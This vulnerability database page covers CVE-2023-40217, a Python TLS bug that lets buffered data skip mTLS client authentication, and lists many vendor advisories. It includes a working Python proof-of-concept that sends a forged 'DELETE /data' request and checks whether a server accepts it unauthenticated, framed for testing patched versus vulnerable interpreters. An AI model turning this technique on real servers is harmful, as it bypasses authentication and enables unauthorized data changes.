5.3
CVSSv3

CVE-2023-40217

Published: 25/08/2023 Updated: 07/11/2023
CVSS v3 Base Score: 5.3 | Impact Score: 1.4 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

An issue exists in Python prior to 3.8.18, 3.9.x prior to 3.9.18, 3.10.x prior to 3.10.13, and 3.11.x prior to 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)
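The following script is an added example, not code from the CVE record or from CPython, that reproduces the window described above on a loopback socket. A plain-TCP peer pushes bytes into an accepted server socket and then closes with SO_LINGER set to zero, so the close goes out as an RST and the server-side socket is left "not connected" while the bytes are still in its receive buffer; the server then wraps that socket with an mTLS context. Assumptions: loopback networking is available, the kernel keeps already-received data readable after an RST (the Linux behaviour the CPython regression test also relies on), no server certificate is loaded because the code path under test never reaches the TLS layer, and the error text "Closed before TLS handshake with data in recv buffer." is the message the fixed releases raise. The constructed payload is a fake HTTP request an attacker might hope an HTTP-over-mTLS server treats as authenticated.

```python
"""Reproduce the pre-handshake window of CVE-2023-40217 on loopback.

  * vulnerable CPython: wrap_socket() succeeds without any handshake and
    recv() returns the peer's plaintext           -> status "leaked"
  * patched CPython:    wrap_socket() raises SSLError
    "Closed before TLS handshake with data in recv buffer." -> "blocked"
"""
import errno
import select
import socket
import ssl
import struct
import sys
import time
from typing import NamedTuple

# Constructed sample input (not from the advisory): unauthenticated bytes an
# attacker would want an mTLS-protected HTTP server to act on.
PAYLOAD = b"DELETE /data HTTP/1.0\r\n\r\n"

# First fixed micro release per minor line, taken from the CVE text.
FIXED_IN = {8: (3, 8, 18), 9: (3, 9, 18), 10: (3, 10, 13), 11: (3, 11, 5)}
IS_LINUX = sys.platform.startswith("linux")


def python_is_patched(version=sys.version_info[:3]):
    """True if an interpreter of this (major, minor, micro) carries the fix."""
    major, minor, _micro = version
    if major != 3:
        return major > 3
    if minor not in FIXED_IN:
        return minor >= 12          # 3.12+ shipped with the fix
    return tuple(version) >= FIXED_IN[minor]


class Outcome(NamedTuple):
    status: str      # "blocked" or "leaked"
    data: bytes      # plaintext handed to the server with no handshake
    detail: str      # error text from wrap_socket(), if it raised
    peer_gone: bool  # getpeername() reported "not connected" before wrapping


def _rst_on_close(sock):
    """SO_LINGER with a zero timeout makes close() send an RST, not a FIN."""
    fmt = "hh" if sys.platform == "win32" else "ii"
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack(fmt, 1, 0))


def _wait_not_connected(sock, timeout=2.0):
    """Poll until the kernel reports the accepted socket as not connected."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            sock.getpeername()
        except OSError as e:
            if e.errno in (errno.ENOTCONN, errno.EINVAL):
                return True
            raise
        time.sleep(0.01)
    return False


def probe_preauth_window():
    """Drive the sequence: connect, send, RST-close, then wrap server-side."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.verify_mode = ssl.CERT_REQUIRED   # mTLS: client certificate required
    # No certificate loaded (assumption): the vulnerable path never creates
    # the OpenSSL object, so a cert chain would not change the outcome here.

    listener, client, conn = socket.socket(), socket.socket(), None
    try:
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        client.connect(listener.getsockname())
        conn, _ = listener.accept()

        client.sendall(PAYLOAD)
        select.select([conn], [], [], 2.0)  # bytes sit in conn's recv buffer
        _rst_on_close(client)
        client.close()                      # RST: conn is now "not connected"
        peer_gone = _wait_not_connected(conn)

        try:
            tls = ctx.wrap_socket(conn, server_side=True)
        except OSError as e:
            # Patched: SSLError "Closed before TLS handshake with data in recv
            # buffer."; any other OSError likewise means nothing was handed up.
            return Outcome("blocked", b"", repr(e), peer_gone)
        # Vulnerable: no handshake ran, yet recv() returns the raw bytes as if
        # they had arrived over an authenticated TLS session.
        with tls:
            tls.settimeout(1.0)
            return Outcome("leaked", tls.recv(4096), "", peer_gone)
    finally:
        for s in (client, listener, conn):
            if s is not None:
                s.close()


if __name__ == "__main__":
    print("patched interpreter:", python_is_patched())
    print(probe_preauth_window())
```

Run it under an interpreter from both sides of the fixed versions to see the two outcomes. The practical reading for a server owner: the window exists only when the socket is closed before `wrap_socket()` runs, the exposure is bounded by the receive buffer, and the fix consists of refusing to wrap a server-side socket that is already disconnected while bytes remain unread; there is no configuration-level mitigation short of upgrading, since the unauthenticated bytes are indistinguishable from data read after a completed handshake.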

Vulnerable Products

Vendor: python | Product: python

Vendor Advisories

An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSL ...
Description: Python 3 ssl.SSLSocket is vulnerable to a bypass of the TLS handshake in certain instances for HTTPS servers and other server-side protocols that use TLS client authentication such as mTLS. This issue may result in a breach of integrity, as it is possible to modify or delete resources that are authenticated only by a TLS certificate ...
Synopsis Important: python27:2.7 security update Type/Severity Security Advisory: Important Topic An update for the python27:2.7 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Secur ...
Synopsis Important: python27:2.7 security update Type/Severity Security Advisory: Important Topic An update for the python27:2.7 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Sup ...
Synopsis Important: python27:2.7 security update Type/Severity Security Advisory: Important Topic An update for the python27:2.7 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Ent ...
Synopsis Important: OpenShift Container Platform 4.13.17 bug fix and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 4.13.17 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Ha ...
Synopsis Important: Fence Agents Remediation Operator 0.2.1 security update Type/Severity Security Advisory: Important Topic This is an updated version for the fence-agents-remediation-operator-bundle-container and the fence-agents-remediation-operator-container. It is now available for Fence Agents Remediation 0.2 for RHEL 8. Red Hat Product ...
Synopsis Important: OpenShift Virtualization 4.12.8 Images security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4.12.8 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact o ...
Synopsis Important: python3.11 security update Type/Severity Security Advisory: Important Topic An update for python3.11 is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as hav ...
Synopsis Important: python3.9 security update Type/Severity Security Advisory: Important Topic An update for python3.9 is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as havin ...
Synopsis Important: Migration Toolkit for Applications security update Type/Severity Security Advisory: Important Topic An update is now available for MTA-6.1-RHEL-8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity ...
Synopsis Important: Release of OpenShift Serverless 1.30.2 Type/Severity Security Advisory: Important Topic Red Hat OpenShift Serverless version 1.30.2 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severit ...
Synopsis Important: python security update Type/Severity Security Advisory: Important Topic An update for python is now available for Red Hat Enterprise Linux 6 Extended Lifecycle Support. Red Hat Product Security has rated ...
Synopsis Important: Migration Toolkit for Applications security and bug fix update Type/Severity Security Advisory: Important Topic Migration Toolkit for Applications 6.2.1 release. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a deta ...
Synopsis Important: Updated Red Hat Process Automation Manager 7.13.4 SP2 Images Type/Severity Security Advisory: Important Topic An update is now available for Red Hat Process Automation Manager including images for Red Hat OpenShift Container Platform. Description Red Hat Process Automation Manager is an open source business process manag ...
Synopsis Important: OpenShift Container Platform 4.12.41 security and extras update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 4.12.41 is now available with updates to packages and images that fix several bugs. This release includes a security update for Red Hat OpenShift Container Platform 4 ...
Synopsis Important: OpenShift Virtualization 4.11.7 Images security and bug fix update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4.11.7 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a secur ...
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Topic An update for python3 is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red Hat Product Securit ...
Synopsis Important: Red Hat OpenShift Service Mesh for 2.3.8 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Service Mesh 2.3 for RHEL 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base sc ...
Synopsis Important: Red Hat OpenShift Service Mesh for 2.2.11 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Service Mesh 2.2 for RHEL 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base s ...
Synopsis Important: Self Node Remediation Operator 0.5.1 security update Type/Severity Security Advisory: Important Topic This is an updated version of the Self Node Remediation Operator. This Operator is delivered by Red Hat Workload Availability. Red Hat Product Security has rated this update as having a security impact of Important. A Commo ...
Synopsis Important: Red Hat OpenShift Service Mesh for 2.4.4 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Service Mesh 2.4 for RHEL 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base sc ...
Synopsis Important: Node Health Check Operator 0.4.1 Type/Severity Security Advisory: Important Topic This is an updated version of the Node Health Check Operator. This Operator is delivered by Red Hat Workload Availability. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring ...
Synopsis Important: Kiali (Kiali 1.65.10) security update Type/Severity Security Advisory: Important Topic An update is now available for Kiali (Kiali 1.65.10) for RHEL 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed seve ...
Synopsis Important: OpenShift Container Platform 4.11.52 bug fix and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 4.11.52 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift ...
Synopsis Important: OpenShift Container Platform 4.12.39 bug fix and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Container Platform release 4.12.39 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift ...
Synopsis Important: python3.9 security update Type/Severity Security Advisory: Important Topic An update for python3.9 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Red Hat Product Security has ...
Synopsis Important: Red Hat OpenShift Pipelines Operator security update Type/Severity Security Advisory: Important Topic An update is now available for OpenShift-Pipelines-1.11-RHEL-8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a ...
Synopsis Important: OpenShift Virtualization 4.13.5 Images security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4.13.5 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact o ...
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Topic An update for python3 is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a ...
Synopsis Moderate: Migration Toolkit for Runtimes bug fix, enhancement and security update Type/Severity Security Advisory: Moderate Topic Migration Toolkit for Runtimes 1.2.3 release. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a de ...
Synopsis Moderate: Red Hat OpenShift Service Mesh Containers for 2.4.5 Type/Severity Security Advisory: Moderate Topic Red Hat OpenShift Service Mesh 2.4.5 Containers. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity ...
Synopsis Important: Red Hat OpenShift Service Mesh Containers for 2.2.12 Type/Severity Security Advisory: Important Topic Red Hat OpenShift Service Mesh 2.2.12 Containers. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed sever ...
Synopsis Moderate: Migration Toolkit for Containers (MTC) 1.8.2 security and bug fix update Type/Severity Security Advisory: Moderate Topic The Migration Toolkit for Containers (MTC) 1.8.2 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base ...
Synopsis Important: python3.11 security update Type/Severity Security Advisory: Important Topic An update for python3.11 is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as hav ...
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Topic An update for python3 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Red Hat Product Security has rate ...
Synopsis Important: python3 security update Type/Severity Security Advisory: Important Topic An update for python3 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Tel ...
Synopsis Important: Red Hat OpenShift Pipelines 1.10.6 release and security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Pipelines 1.10.6 has been released. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a ...
Synopsis Important: Node Health Check Operator 0.6.1 security update Type/Severity Security Advisory: Important Topic This is an updated version for the node-healthcheck-must-gather-container, the node-healthcheck-operator-bundle-container, the node-healthcheck-operator-container, and the node-remediation-console-container. It is now availabl ...
Synopsis Important: OpenShift Container Platform 4.13 low-latency extras security update Type/Severity Security Advisory: Important Topic An update for cnf-tests-container, dpdk-base-container, performance-addon-operator-must-gather, NUMA-aware secondary scheduler and numaresources-operator is now available for Red Hat OpenShift Container Plat ...
PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS ...

Github Repositories

Github action to check findings of aws inspector scans

Check AWS Inspector v1.1. This action can be used to check the findings of an Amazon Inspector scan. It has only been tested with Inspector v2. Currently the action also only supports checking the results of scans on images pushed to ECR. May be modified for Lambdas and EC2 instances in the future. Usage: - uses: ecperth/check-aws-inspector@v1.1 with: # ecr repository n